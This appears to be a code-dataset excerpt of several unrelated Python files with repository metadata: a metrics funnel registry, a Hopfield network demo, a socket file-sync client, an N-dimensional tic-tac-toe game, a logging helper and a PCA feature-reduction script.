reg[1] = 8725355 # 7
while True:
reg[5] = reg[2] & 255 # 8
reg[1] += reg[5] # 9
reg[1] &= 16777215 # 10
reg[1] *= 65899 # 11
reg[1] &= 16777215 # 12
reg[2] = reg[2] // 256
if reg[2] == 0:
break_true = True
break
break_true = False
| 22.976744 | 62 | 0.403846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 120 | 0.121457 |
b15ea12d5029680389c91718e2950c1e519b15d4 | 1,247 | py | Python | website/canvas/funnels.py | bopopescu/drawquest-web | 8d8f9149b6efeb65202809a5f8916386f58a1b3b | ["BSD-3-Clause"] | 61 | 2015-11-10T17:13:46.000Z | 2021-08-06T17:58:30.000Z | website/canvas/funnels.py | bopopescu/drawquest-web | 8d8f9149b6efeb65202809a5f8916386f58a1b3b | ["BSD-3-Clause"] | 13 | 2015-11-11T07:49:41.000Z | 2021-06-09T03:45:31.000Z | website/canvas/funnels.py | bopopescu/drawquest-web | 8d8f9149b6efeb65202809a5f8916386f58a1b3b | ["BSD-3-Clause"] | 18 | 2015-11-11T04:50:04.000Z | 2021-08-20T00:57:11.000Z |
from django.conf import settings
from canvas.metrics import Metrics
class Funnel(object):
def __init__(self, name, steps):
self.name = name
self.steps = steps
def __repr__(self):
return self.name
def step_names(self):
return [step.name for step in self.steps]
class Funnels(object):
if settings.PROJECT == 'canvas':
names = (
('signup_to_activation', [
Metrics.signup,
Metrics.sticker,
Metrics.post,
]),
('onboarding', [
Metrics.signup_form_view,
Metrics.signup,
Metrics.onboarding_funnel_start,
Metrics.onboarding_groups,
Metrics.onboarding_invites,
Metrics.invite_facebook_friends,
Metrics.onboarding_welcome_tutorial_view,
Metrics.onboarding_finish,
]),
)
elif settings.PROJECT == 'drawquest':
names = ()
def _setup_funnels():
by_name = {}
for name, steps in Funnels.names:
funnel = Funnel(name, steps)
setattr(Funnels, name, funnel)
by_name[name] = funnel
Funnels.by_name = by_name
_setup_funnels()
| 25.979167 | 57 | 0.565357 | 940 | 0.753809 | 0 | 0 | 0 | 0 | 0 | 0 | 53 | 0.042502 |
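_setup_funnels() runs at import time, so the funnels above are reachable both as class attributes and through the registry; a minimal sketch, assuming the canvas settings branch is active:

funnel = Funnels.by_name['onboarding']   # equivalently: Funnels.onboarding
print(funnel, funnel.step_names())       # step names come from the Metrics objects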
b1612586b6458c702c53a9e35ab3d78b199a5137 | 3,948 | py | Python | hopfield.py | mstruijs/neural-demos | 2be157bbac4b42c008190745bb3ee75a278d7e34 | ["MIT"] | null | null | null | hopfield.py | mstruijs/neural-demos | 2be157bbac4b42c008190745bb3ee75a278d7e34 | ["MIT"] | null | null | null | hopfield.py | mstruijs/neural-demos | 2be157bbac4b42c008190745bb3ee75a278d7e34 | ["MIT"] | null | null | null |
import numpy as np
from neupy import algorithms,plots
import matplotlib.pyplot as plt
from neupy.utils import format_data
from neupy.algorithms.memory.utils import bin2sign,step_function
import argparse
dhnet = algorithms.DiscreteHopfieldNetwork(mode='async', check_limit=False)
iteration = 0
output_data = None
n_features = 0
def ascii_visualise(bin_vector, m=10,n=10):
'''
Basic visualisation for debug purposes: print binary vector as m x n matrix
'''
for row in bin_vector.reshape((n,m)).tolist():
print(' '.join('.X'[val] for val in row))
def read_data(filename):
'''
Read the training/test data from file and return it in a list of matrices.
'''
res = [];
m = [];
rf = open(filename, 'r')
for line in rf.readlines():
if len(line) == 1:#empty line
res.append(np.matrix(m))
m = [];
continue
for char in line.strip():
m.append(1 if char=='X' else 0)
res.append(np.matrix(m))
rf.close()
return res
def train(data):
'''
Train the network with the supplied data
'''
dhnet.train(np.concatenate(data, axis = 0))
def run(input, iterations=None, show=False):
'''
Run the trained network with the given input, for the specified number of iterations.
    Print the result if `show`.
'''
result = dhnet.predict(input, iterations)
if show:
ascii_visualise(result)
print()
return result
def show_weights():
'''
Plot the weight matrix in a Hinton diagram
'''
plt.figure(figsize=(14,12))
plt.title("Hinton diagram (weights)")
plots.hinton(dhnet.weight)
plt.show()
def initialise_run(input_data):
'''
Prepare a controlled iteration on a trained network for the given input
'''
global iteration,dhnet,output_data,n_features
iteration = 0
dhnet.discrete_validation(input_data)
input_data = format_data(bin2sign(input_data), is_feature1d=False)
_, n_features = input_data.shape
output_data = input_data
def step(step_size=1, show=False):
'''
Execute `step_size` asynchronous update steps on the initialised network.
Print the result if `show`.
'''
global iteration,dhnet,output_data,n_features
for _ in range(step_size):
iteration+=1
position = np.random.randint(0, n_features - 1)
raw_new_value = output_data.dot(dhnet.weight[:, position])
output_data[:, position] = np.sign(raw_new_value)
result = step_function(output_data).astype(int)
if show:
print("--Iteration " + str(iteration) + ":")
ascii_visualise(result)
return result
def is_stable():
'''
Return True iff the initialised network has reached a stable output
'''
global dhnet,output_data,n_features,iteration
for position in range(0,n_features-1):
raw_new_value = output_data.dot(dhnet.weight[:, position])
if np.sign(raw_new_value) != output_data[0][position]:
return False
return True
def run_to_convergence(input_data, show_list=[], show_all=True):
'''
Runs a trained network on `input_data` until it converges to a stable output.
Print the intermediate output at all positions in `show_list`.
'''
initialise_run(input_data)
i=0
result = None
while not(is_stable()):
i+=1
result=step(show=(i in show_list or show_all))
return result
def get_args():
parser = argparse.ArgumentParser(description='Hopfield neural network')
parser.add_argument('-g','--train', help='Training data set path', required=True)
parser.add_argument('-t','--test', help='Testing data set path', required=True)
return vars(parser.parse_args())
if __name__ == "__main__":
args = get_args()
training_data = read_data(str(args['train']))
train(training_data)
test_data = read_data(str(args['test']))
print('--Start')
ascii_visualise(test_data[0])
step_run = False
if step_run:
initialise_run(test_data[0])
for i in range(1,300,5):
print("--Iteration " + str(i) + ":")
step(step_size=5,show=True)
if is_stable():
break
else:
res = run_to_convergence(test_data[0],[62,144,232,379])
print("--Iteration " + str(iteration) + ":")
ascii_visualise(res)
print('--End')
| 27.608392 | 87 | 0.719352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,065 | 0.269757 |
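The training and test files parsed by read_data above are blocks of '.'/'X' rows separated by blank lines. A hypothetical way to generate a one-pattern training file matching the 10x10 grid that ascii_visualise assumes:

# Write one 10x10 memory (a hollow square); append further blocks separated
# by a blank line to store additional patterns.
rows = ["XXXXXXXXXX" if r in (0, 9) else "X........X" for r in range(10)]
with open("train.txt", "w") as f:
    f.write("\n".join(rows) + "\n")

# Then run, e.g.:  python hopfield.py -g train.txt -t test.txt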
b161578913391598cf5bd530a5ec301a0546f6e8 | 686 | py | Python | client/fig_client.py | haihala/fig | 426e2ee218c8a55e6389ace497a7f365425daae1 | ["MIT"] | null | null | null | client/fig_client.py | haihala/fig | 426e2ee218c8a55e6389ace497a7f365425daae1 | ["MIT"] | null | null | null | client/fig_client.py | haihala/fig | 426e2ee218c8a55e6389ace497a7f365425daae1 | ["MIT"] | null | null | null |
from init import conf_parse, socket_init
from sock_ops import pull_sync, push_sync
from fs_ops import construct_tree, differences
from debug import debug_print
import time
def main():
conf = conf_parse()
sock = socket_init(conf)
debug_print("Initialization successful")
debug_print("Checking remote")
pull_sync(sock, conf["project"])
debug_print("Pull successfull")
client_tree = construct_tree()
while True:
if differences(client_tree):
debug_print("Different spotted, pushing")
client_tree = construct_tree()
push_sync(sock, conf["project"])
if conf["auto"]:
time.sleep(conf["auto"])
else:
input("Enter to sync")
if __name__ == "__main__":
main()
| 21.4375 | 46 | 0.740525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 145 | 0.21137 |
b161de6456d6f8b14c33e69247fe9c0fa8b2fa93 | 23,850 | py | Python | TicTacToe2.py | tlively/N-TicTacToe | db1143e2e94012451ba590952670452431814b7b | ["MIT"] | 6 | 2017-10-03T13:37:54.000Z | 2020-12-21T07:34:01.000Z | TicTacToe2.py | tlively/N-TicTacToe | db1143e2e94012451ba590952670452431814b7b | ["MIT"] | null | null | null | TicTacToe2.py | tlively/N-TicTacToe | db1143e2e94012451ba590952670452431814b7b | ["MIT"] | 4 | 2017-07-04T18:53:52.000Z | 2021-03-24T03:15:07.000Z |
# N-Dimensional Tic-Tac-Toe by Thomas Lively
from __future__ import division
import curses, curses.ascii, sys
# logical representation of the n-dimensional board as a single list
class Model(object):
def __init__(self, dimensions=2, size=0, players=2):
if size < 3:
size = dimensions+1
self.dimensions = dimensions
self.size = size
if self.size < 3:
self.size = 3
self.players = players
if self.players < 2 or self.players > 9:
self.players = 2
self.board = [0 for i in xrange(size**dimensions)]
self.current_player = 1
self.game_over = False
self.tied_game = False
self.moves = 0
# makes the next player the active player
def nextTurn(self):
self.current_player += 1
if self.current_player > self.players:
self.current_player = 1
return self.current_player
def playAtCoordinate(self, coord):
self.validateCoord(coord)
self.playAtIndex(self.getIndexFromCoord(coord))
# puts the current player's number into this index of the array then check game over
def playAtIndex(self, index):
self.validateIndex(index)
if self.board[index] != 0:
raise IllegalMoveError(index)
return
self.board[index] = self.current_player
seqs = self.getSequencesFromIndex(index)
for seq in seqs:
n = 0
for coord in seq:
if self.board[self.getIndexFromCoord(coord)] == self.current_player:
n += 1
if n == self.size:
self.game_over = True
break
self.moves += 1
if self.moves == self.size ** self.dimensions:
self.tied_game = True
self.game_over = True
def getIndexFromCoord(self, coord):
self.validateCoord(coord)
index = 0
for i in xrange(len(coord)-1,-1,-1):
index += coord[i]*(self.size**i)
return index
def getCoordFromIndex(self, index):
self.validateIndex(index)
coord_list = []
for i in xrange(self.dimensions):
nd = self.size**(self.dimensions-1-i)
coord_list.append(index//nd)
index %= nd
coord_list.reverse()
return tuple(coord_list)
def getSequencesFromIndex(self, index):
return self.getSequencesFromCoord(self.getCoordFromIndex(index))
# returns all the possible winning sequences containing this coordinate set
def getSequencesFromCoord(self, coord):
# from a set of indices, return a subset with elements indicated by the ones in
# bin_rep
def getIndexSet(indices, bin_rep):
iset = []
for i in xrange(len(indices)):
if bin_rep[i] == u"1":
iset.append(indices[i])
return iset
# given a set of indices that should be varied, return the n versions of coord
def getVariedSequences(varying_indices):
returned_sequences = []
for i in xrange(self.size):
new_coord = list(coord)
for index in varying_indices:
if coord[index] < self.size//2:
new_coord[index] = i
else:
new_coord[index] = self.size-i-1
returned_sequences.append(new_coord)
return returned_sequences
# given a set of indices that should be varied and a binary representation of
# the direction in which they should vary, return the n versions of coord
def getMidVariedSequences(varying_indices, vary_dir):
returned_sequences = []
for i in xrange(self.size):
new_coord = list(coord)
for j in xrange(len(varying_indices)):
if vary_dir[j] == u"1":
new_coord[varying_indices[j]] = i
else:
new_coord[varying_indices[j]] = self.size-i-1
returned_sequences.append(new_coord)
return returned_sequences
self.validateCoord(coord)
returned_sequences = []
# for values up to half if evenly sized, up to middle-1 if oddly sized
for x in xrange(self.size//2+1):
x2 = self.size-x-1
all_indices = []
for index in xrange(len(coord)):
if coord[index] == x or coord[index] == x2:
all_indices.append(index)
for i in xrange(1, 2 ** len(all_indices)):
bin_rep = bin(i)[2:]
while len(bin_rep) < len(all_indices):
bin_rep = u"0" + bin_rep
iset = getIndexSet(all_indices, bin_rep)
if x != x2:
returned_sequences.append(getVariedSequences(iset))
else:
for j in xrange(2 ** (len(iset)-1)):
dir_vary = bin(j)[2:]
while len(dir_vary) < len(iset):
dir_vary = u"0" + dir_vary
mid_sequences = getMidVariedSequences(iset, dir_vary)
returned_sequences.append(mid_sequences)
return returned_sequences
def validateIndex(self, index):
if index < 0 or index >= len(self.board):
raise ValueError(u"Invalid index")
def validateCoord(self, coord):
if len(coord) != self.dimensions:
raise ValueError(u"Coordinate needs " + unicode(self.dimensions) + u" dimensions")
return
for i in coord:
if i >= self.size or i < 0:
raise ValueError(u"0 <= coordinate < " + unicode(self.size))
return
# xy pairs from high order to low order to model coordinates
def XYCoordToCoord(self, xy):
coord = []
start = 0
if self.dimensions % 2 == 1:
start = 1
for i in xrange(start+1, len(xy), 2):
coord.insert(0, xy[i])
if start == 1:
coord.insert(0, xy[0])
for i in xrange(start, len(xy), 2):
coord.insert(0, xy[i])
return tuple(coord)
class IllegalMoveError(Exception):
def __init__(self, index):
self.index = index
def __str__(self):
return u"Illegal move at index " + unicode(self.index)
# A view for the model. Other views might use Curses or a graphics library
class PlainTextView():
def __init__(self, model):
self.model = model
self.create()
# returns the divider that goes between board units of the d-th horizontal order
def getHorizontalDivider(self, d):
if d < 0: return
if d == 0: return [u"|"]
if d == 1: return [u" "]
div = [u" ", u" "]
for i in xrange(d-1):
div.insert(1, u"|")
return div
# returns the divider that goes between board units of the d-th vertical order
def getVerticalDivider(self, d):
if d < 0: return
if d == 0: return [u"-"]
if d == 1: return [u" "]
div = [u" ", u" "]
for i in xrange(d-1):
div.insert(1, u"-")
return div
# recursively create the board as a matrix of characters
def createMatrix(self, d):
if d < 0: return
if d == 0: return [[u"X"]]
sub_block = self.createMatrix(d-1)
returned = []
if d % 2 == 1:
divider = self.getHorizontalDivider(d // 2)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
for i in xrange(self.model.size - 1):
for char in divider:
new_row.append(char)
for char in row:
new_row.append(char)
returned.append(new_row)
return returned
if d % 2 == 0:
divider = self.getVerticalDivider(d // 2 - 1)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
returned.append(new_row)
for i in xrange (self.model.size - 1):
for char in divider:
new_row = []
for j in xrange(len(sub_block[0])):
new_row.append(char)
returned.append(new_row)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
returned.append(new_row)
return returned
# use the matrix of characters that make up the board to create maps from the
# representation's indices to the models and vice versa, and create an str
def create(self):
matrix = self.createMatrix(self.model.dimensions)
self.str_rep = u""
for row in matrix:
for char in row:
self.str_rep += char
self.str_rep += u"\n"
#print(str_rep)
self.model_to_view = dict()
self.view_to_model = dict()
model_index = 0
for i in xrange(len(self.str_rep)):
if self.str_rep[i] == u"X":
self.str_rep = self.str_rep.replace(u"X", u" ", 1)
self.model_to_view[model_index] = i
self.view_to_model[i] = model_index
model_index += 1
# given char from model, return char for display
def getDisplayChar(self, c):
if c == 0: return u" "
if self.model.players == 2:
if c == 1: return u"X"
if c == 2: return u"O"
return unicode(c)
# must be called to update the view when the state of index i in the model changes
def update(self, i):
index = self.model_to_view[i]
char = self.getDisplayChar(self.model.board[i])
self.str_rep = self.str_rep[:index] + char + self.str_rep[index+1:]
def __str__(self):
return self.str_rep
# serves as a "Main" class and controls user interface with model and view
class TextGameController():
def __init__(self):
dimensions = int(raw_input(u"dimensions: "))
size = int(raw_input(u"size: "))
players = int(raw_input(u"players: "))
print u"creating model..."
self.board = Model(dimensions, size, players)
print u"creating view..."
self.view = PlainTextView(self.board)
while True:
print
print self.view
print
player = u"Player " + unicode(self.board.current_player)
coord = self.makeMove(player + u": ")
self.view.update(self.board.getIndexFromCoord(coord))
if self.board.game_over:
if self.board.tied_game:
print u"It's a tie :("
break
print self.view
print
print player + u" wins!"
break
self.board.nextTurn()
# transform user input to model coordinates
# and coordinates through necessary checks, repeating if necessary
def makeMove(self, prompt):
coord = None
while True:
try:
raw_in = eval(u"(" + raw_input(prompt) + u")")
coord = self.board.XYCoordToCoord(raw_in)
print coord
except Exception, e:
print u"Unrecognizable input"
continue
try:
self.board.validateCoord(coord)
except Exception, e:
print e
continue
try:
self.board.playAtCoordinate(coord)
break
except Exception, e:
print u"Illegal move!"
continue
return coord
class CursesController(object):
def main(self, stdscr):
model = self.model
view = self.view
def alert():
curses.beep()
curses.flash()
uneven = model.dimensions % 2 != 0
locked_coords = []
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
def getEnclosingRectangle(coord):
extension = xrange(model.dimensions - len(coord))
min_xycoord = coord[:]
min_xycoord.extend([0 for i in extension])
min_coord = model.XYCoordToCoord(min_xycoord)
max_xycoord = coord[:]
max_xycoord.extend([model.size-1 for i in extension])
max_coord = model.XYCoordToCoord(max_xycoord)
min_index = view.model_to_view[model.getIndexFromCoord(min_coord)]
min_index = min_index - unicode(view).count(u"\n",0, min_index)
max_index = view.model_to_view[model.getIndexFromCoord(max_coord)]
max_index = max_index - unicode(view).count(u"\n",0, max_index)
length = unicode(view).find(u"\n")
min_x = min_index % length
min_y = min_index // length
max_x = max_index % length
max_y = max_index // length
return (min_y,min_x,max_y,max_x)
def getPlayerColor(p):
colors = {1:4,2:1,3:2,4:3,5:5,6:6,7:7,8:5,9:7}
return int(colors[((p-1)%9)+1])
curses.curs_set(0)
win = curses.newpad(unicode(view).count(u"\n")+1, unicode(view).find(u"\n")+1)
for i in xrange(1,8):
curses.init_pair(i,i,0)
history = []
initialized = False
while not model.game_over:
stdscr.clear()
# Title Box Outline
stdscr.addch(0,0,curses.ACS_ULCORNER)
stdscr.hline(0,1,curses.ACS_HLINE,curses.COLS-2)
stdscr.addch(0,curses.COLS-1,curses.ACS_URCORNER)
stdscr.vline(1,0,curses.ACS_VLINE,3)
stdscr.vline(1,curses.COLS-1,curses.ACS_VLINE,3)
panel_width = model.dimensions * 2 + 11
# Board Area Outline
stdscr.addch(4,0,curses.ACS_ULCORNER)
stdscr.hline(4,1,curses.ACS_HLINE,curses.COLS-panel_width-1)
stdscr.addch(curses.LINES-1,0,curses.ACS_LLCORNER)
stdscr.hline(curses.LINES-1,1,curses.ACS_HLINE,curses.COLS-panel_width-1)
stdscr.vline(5,0,curses.ACS_VLINE,curses.LINES-6)
# Top Panel Box Outline
stdscr.addch(4,curses.COLS-panel_width,curses.ACS_ULCORNER)
stdscr.hline(4,curses.COLS-panel_width+1,curses.ACS_HLINE,panel_width-2)
stdscr.addch(4,curses.COLS-1,curses.ACS_URCORNER)
stdscr.vline(5,curses.COLS-panel_width,curses.ACS_VLINE,4)
stdscr.vline(5,curses.COLS-1,curses.ACS_VLINE,4)
stdscr.addch(9,curses.COLS-panel_width,curses.ACS_LLCORNER)
stdscr.addch(9,curses.COLS-1,curses.ACS_LRCORNER)
stdscr.hline(9,curses.COLS-panel_width+1,curses.ACS_HLINE,panel_width-2)
# Bottom Panel OUTLINE
stdscr.vline(10,curses.COLS-panel_width,curses.ACS_VLINE,curses.LINES-11)
stdscr.vline(10,curses.COLS-1,curses.ACS_VLINE,curses.LINES-11)
stdscr.addch(curses.LINES-1,curses.COLS-panel_width,curses.ACS_LLCORNER)
stdscr.hline(curses.LINES-1,curses.COLS-panel_width+1,
curses.ACS_HLINE,panel_width-2)
try:stdscr.addch(curses.LINES-1,curses.COLS-1,curses.ACS_LRCORNER)
except:pass
title = u"N-Dimensional Tic-Tac-Toe ({0}^{1})"\
.format(model.size,model.dimensions)
stdscr.addstr(2, curses.COLS//2 - len(title)//2, title)
# Get input
key = None
curses.flushinp()
if initialized:
key = win.getch()
else:
initialized = True
if key == ord(u"w"):
if selected_y == 0 or len(locked_coords) == 0 and uneven:
alert()
else:
selected_y -= 1
if key == ord(u"s"):
if selected_y == model.size-1 or len(locked_coords) == 0 and uneven:
alert()
else:
selected_y += 1
if key == ord(u"a"):
if selected_x == 0:
alert()
else:
selected_x -= 1
if key == ord(u"d"):
if selected_x == model.size-1:
alert()
else:
selected_x += 1
if key == ord(u"\n"):
locked_coords.append(selected_x)
if not (len(locked_coords) == 1 and uneven):
locked_coords.append(selected_y)
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
if len(locked_coords) == model.dimensions:
try:
coord = model.XYCoordToCoord(locked_coords)
model.playAtCoordinate(coord)
view.update(model.getIndexFromCoord(coord))
history.insert(0, (model.current_player, locked_coords[:]))
del locked_coords[:]
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
if not model.game_over:
model.nextTurn()
except Exception:
key = curses.ascii.ESC
if key == curses.ascii.ESC:
if len(locked_coords) == 0:
alert()
else:
selected_y = locked_coords[-1]
del locked_coords[-1]
if not (len(locked_coords) == 0):
selected_x = locked_coords[-1]
del locked_coords[-1]
else:
selected_x = selected_y
selected_y = 0
# Draw info box contents
info_line = u"Player {0}".format(model.current_player)
stdscr.addstr(6, int(curses.COLS-(panel_width + len(info_line))/2),
info_line,
curses.color_pair(
getPlayerColor(
model.current_player)))
info_coord = locked_coords[:]
info_coord.append(selected_x)
if not (len(locked_coords) == 0 and uneven):
info_coord.append(selected_y)
info_line = unicode(info_coord)[1:-1].replace(u" ", u"")
stdscr.addstr(7, int(curses.COLS-(panel_width + len(info_line))/2),
info_line,
curses.color_pair(
getPlayerColor(
model.current_player)))
# Draw move history
for i, move in enumerate(history):
if 10 + i == curses.LINES -1:
break
p, loc = move
loc = unicode(loc)[1:-1].replace(u" ", u"")
stdscr.addstr(10+i, curses.COLS-panel_width+1,
u"Player {0}: {1}".format(p, loc),
curses.color_pair(getPlayerColor(p)))
# Draw board
win.addstr(0,0, unicode(view))
# Highlight selected area
coord = locked_coords[:]
coord.append(selected_x)
if not (len(locked_coords) == 0 and uneven):
coord.append(selected_y)
min_y,min_x,max_y,max_x = getEnclosingRectangle(coord)
for y in xrange(min_y, max_y+1):
win.chgat(y, min_x, max_x + 1 - min_x,
curses.A_REVERSE |
curses.color_pair(getPlayerColor(model.current_player)))
# Highlight past moves
for p, loc in history:
rect = getEnclosingRectangle(loc)
current = win.inch(rect[0], rect[1])
if current == current | curses.A_REVERSE:
win.chgat(rect[0], rect[1], 1, curses.color_pair(getPlayerColor(p)))
else:
win.chgat(rect[0], rect[1], 1,
curses.color_pair(getPlayerColor(p)) | curses.A_REVERSE)
# Calculate area of board to display
pminrow = 0
pmincol = 0
pheight = unicode(view).count(u"\n")-1
pwidth = unicode(view).find(u"\n")-1
sminrow = 5
smincol = 1
smaxrow = curses.LINES-2
smaxcol = curses.COLS-panel_width-1
sheight = smaxrow - sminrow
swidth = smaxcol - smincol
if pheight <= sheight:
dif = sheight - pheight
sminrow += dif // 2
else:
pminrow1 = min_y - sheight * min_y / pheight
pminrow2 = sheight/pheight*(pheight-max_y) + max_y - sheight
dif1 = min_y
dif2 = pheight - max_y
if not (dif1 == 0 and dif2 == 0):
pminrow = int((pminrow1 * dif2 + pminrow2 * dif1) / (dif1 + dif2)+.5)
else:
dif = sheight - pheight
sminrow += dif // 2
if pwidth <= swidth:
dif = swidth - pwidth
smincol += dif // 2
else:
pmincol1 = min_x - swidth * min_x / pwidth
pmincol2 = swidth/pwidth*(pwidth-max_x) + max_x - swidth
dif1 = min_x
dif2 = pwidth - max_x
if not (dif1 == 0 and dif2 == 0):
pmincol = int((pmincol1 * dif2 + pmincol2 * dif1) / (dif1 + dif2)+.5)
else:
dif = swidth - pwidth
smincol += dif // 2
# Refresh the display
stdscr.refresh()
win.refresh(pminrow, pmincol, sminrow, smincol, smaxrow, smaxcol)
stdscr.clear()
win.clear()
if not model.tied_game:
player = model.current_player
message = u"PLAYER {0} WINS!".format(player)
stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
curses.A_BLINK | curses.A_REVERSE | curses.color_pair(getPlayerColor(player)))
else:
message = u"IT'S A TIE :("
stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
curses.A_BLINK | curses.A_REVERSE)
stdscr.getch()
def __init__(self, model):
self.model = model
self.view = PlainTextView(self.model)
curses.wrapper(self.main)
# run the game if run as a script
if __name__ == u"__main__":
#TextGameController()
args = [int(i) for i in sys.argv[1:]]
if args:
CursesController(Model(*args))
else:
CursesController(Model(4))
| 38.405797 | 94 | 0.512704 | 23,258 | 0.975178 | 0 | 0 | 0 | 0 | 0 | 0 | 2,407 | 0.100922 |
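The module above targets Python 2 (print statements, xrange, old-style except clauses). Command-line arguments feed straight into Model(*args) as (dimensions, size, players); with no arguments it builds Model(4), a 5^4 board. The logical Model can also be exercised on its own; a sketch:

m = Model(dimensions=2, size=3, players=2)
m.playAtCoordinate((1, 1))                   # player 1 takes the centre cell
print len(m.getSequencesFromCoord((1, 1)))   # 4: the row, the column, both diagonals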
b161fd74a00848098e638db57b29a16c1340bf14 | 854 | py | Python | platform-tools/systrace/catapult/devil/devil/utils/run_tests_helper.py | NBPS-Robotics/FTC-Code-Team-9987---2022 | 180538f3ebd234635fa88f96ae7cf7441df6a246 | ["MIT"] | 1,894 | 2015-04-17T18:29:53.000Z | 2022-03-28T22:41:06.000Z | platform-tools/systrace/catapult/devil/devil/utils/run_tests_helper.py | NBPS-Robotics/FTC-Code-Team-9987---2022 | 180538f3ebd234635fa88f96ae7cf7441df6a246 | ["MIT"] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | platform-tools/systrace/catapult/devil/devil/utils/run_tests_helper.py | NBPS-Robotics/FTC-Code-Team-9987---2022 | 180538f3ebd234635fa88f96ae7cf7441df6a246 | ["MIT"] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper functions common to native, java and host-driven test runners."""
import collections
import logging
from devil.utils import logging_common
CustomFormatter = logging_common.CustomFormatter
_WrappedLoggingArgs = collections.namedtuple('_WrappedLoggingArgs',
['verbose', 'quiet'])
def SetLogLevel(verbose_count, add_handler=True):
"""Sets log level as |verbose_count|.
Args:
verbose_count: Verbosity level.
add_handler: If true, adds a handler with |CustomFormatter|.
"""
logging_common.InitializeLogging(
_WrappedLoggingArgs(verbose_count, 0),
handler=None if add_handler else logging.NullHandler())
| 31.62963 | 75 | 0.725995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 428 | 0.501171 |
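A usage sketch for the wrapper above; in devil-based tools a -vv flag typically reaches this helper as verbose_count=2, which InitializeLogging maps to DEBUG-level output.

from devil.utils import run_tests_helper

run_tests_helper.SetLogLevel(verbose_count=2)  # installs a CustomFormatter handler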
b1623f67cebbb4df1eda133e8176caaaf6a0be46 | 4,819 | py | Python | src/classical_ml/pca.py | Jagriti-dixit/CS229_Project_Final | 16fdb55086411dee17153e88b2499c378cdfc096 | ["MIT"] | null | null | null | src/classical_ml/pca.py | Jagriti-dixit/CS229_Project_Final | 16fdb55086411dee17153e88b2499c378cdfc096 | ["MIT"] | null | null | null | src/classical_ml/pca.py | Jagriti-dixit/CS229_Project_Final | 16fdb55086411dee17153e88b2499c378cdfc096 | ["MIT"] | null | null | null |
import sys
import time
import json
import math, random
import zipfile as zf
from pathlib import Path

from comet_ml import Experiment
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import pydub
from pydub import AudioSegment
import librosa
import librosa.display
import soundfile as sf

import sklearn
from sklearn import metrics, preprocessing, svm
from sklearn.preprocessing import MinMaxScaler, StandardScaler, LabelEncoder
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import RFE
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.datasets import make_classification
from sklearn.metrics import (accuracy_score, classification_report, precision_score,
                             recall_score, f1_score, confusion_matrix,
                             precision_recall_curve, roc_curve, auc, log_loss,
                             ConfusionMatrixDisplay, plot_confusion_matrix)
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE

import getSamples as gs
train_file = sys.argv[1]
test_file = sys.argv[2]
print("Reading train and test dataset")
#train = pd.read_csv('train_data_noise_pad.csv')
train = pd.read_csv(train_file)
print("read train data")
#test = pd.read_csv('test_data_noise_pad.csv')
test = pd.read_csv(test_file)
print("read test data")
print("Read two big files ")
X_train = train.iloc[:,:2040]
y_train = train.iloc[:,2041]
X_test = test.iloc[:,:2040]
y_test = test.iloc[:,2041]
# X_train = train.iloc[:,:20]
# y_train = train.iloc[:,21]
# X_test = test.iloc[:,:20]
# y_test = test.iloc[:,21]
X_train = StandardScaler(with_mean=True).fit_transform(X_train)
X_test = StandardScaler(with_mean=True).fit_transform(X_test)
print("Mean of train data is ",np.mean(X_train),"Std deviation is",np.std(X_train))
pca = PCA().fit(X_train)  # fit with all components to inspect the full variance spectrum
print('Explained variation per principal component:{}'.format((pca.explained_variance_ratio_)))
plt.plot(np.cumsum(pca.explained_variance_ratio_))
plt.xlabel('number of components')
plt.ylabel('Cumulative explained variance')
plt.savefig("cumulative_variance_plot.png")
time_start = time.time()
print("we want to see the accumulated variance of 700 features ")
pca = PCA(n_components = 700)
pca_result = pca.fit_transform(X_train)
pca_test = pca.transform(X_test)
X_train_pca = pca_result
X_test_pca = pca_test
out_train = "train_pca.csv"
pca_train = pd.DataFrame(data=X_train_pca)
pca_train['language'] = y_train
out_file_train = open(out_train,'wb')
pca_train.to_csv(out_file_train,index=False)
out_file_train.close()
out_test = "test_pca.csv"
pca_test = pd.DataFrame(data=X_test_pca)
pca_test['language'] = y_test
out_file_test = open(out_test,'wb')
pca_test.to_csv(out_file_test,index=False)
out_file_test.close()
print("shapes are",X_train_pca.shape,y_train.shape)
print("X_train shape is ",X_train_pca.shape,"X_test shape is",X_test_pca.shape)
print("Total variation in these 1000 features is",np.sum(pca.explained_variance_ratio_))
print('PCA done! Time elapsed: {} seconds'.format(time.time()-time_start))
print("Now lets plot PCA for 2D visualisation")
##Taking only some of the total dataset randomly for plotting
np.random.seed(42)
rndperm = np.random.permutation(train.shape[0])
#2D plot(Having two components)
plt.figure(figsize=(16,10))
pca = PCA(n_components = 2)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
sns.scatterplot(
x="pca_one", y="pca_two",
hue="2041",
palette=sns.color_palette("hls", 3),
data=train.loc[rndperm,:],
legend="full",
alpha=0.3
)
plt.savefig("PCA_2d.png")
###PCA with 3 components
pca = PCA(n_components = 3)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
train['pca_three'] = pca_result[:,2]
print("Its processing 3d plot")
#3D plot(Having 3 components)
